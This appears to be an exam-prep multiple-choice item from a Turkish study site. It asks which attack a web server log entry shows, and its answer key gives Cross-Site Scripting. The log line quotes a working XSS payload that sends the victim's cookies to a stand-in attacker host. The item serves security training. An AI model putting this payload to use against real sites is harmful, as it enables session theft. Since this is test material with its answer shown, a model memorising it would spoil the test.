A security technician inspecting web server access logs in a SIEM dashboard analyzes the following log entry:
`192.168.10.45 - - [27/Jul/2026:14:15:22 +0000] "GET /comment.php?user_input=<script>document.location='http://attacker.com/steal.php?cookie='+document.cookie</script> HTTP/1.1" 200 452`
Which of the following security events is demonstrated in this log snippet?
- Cross-Site Scripting (XSS) attackCevap
- BSQL injection attack targeting the backend database
- CUnauthorized authentication bypass attempt
- DDeterrent security control misconfiguration event
Cevap
The log snippet demonstrates a Cross-Site Scripting (XSS) attack.
The correct answer is Cross-Site Scripting (XSS) attack because the HTTP GET request contains explicit `<script>` tags designed to execute client-side JavaScript code in a user's web browser to exfiltrate session cookies.
Adım Adım Çözüm
Anahtar Kavram
Identifying Cross-Site Scripting (XSS) in Web Server Logs
Tahmini Süre:45s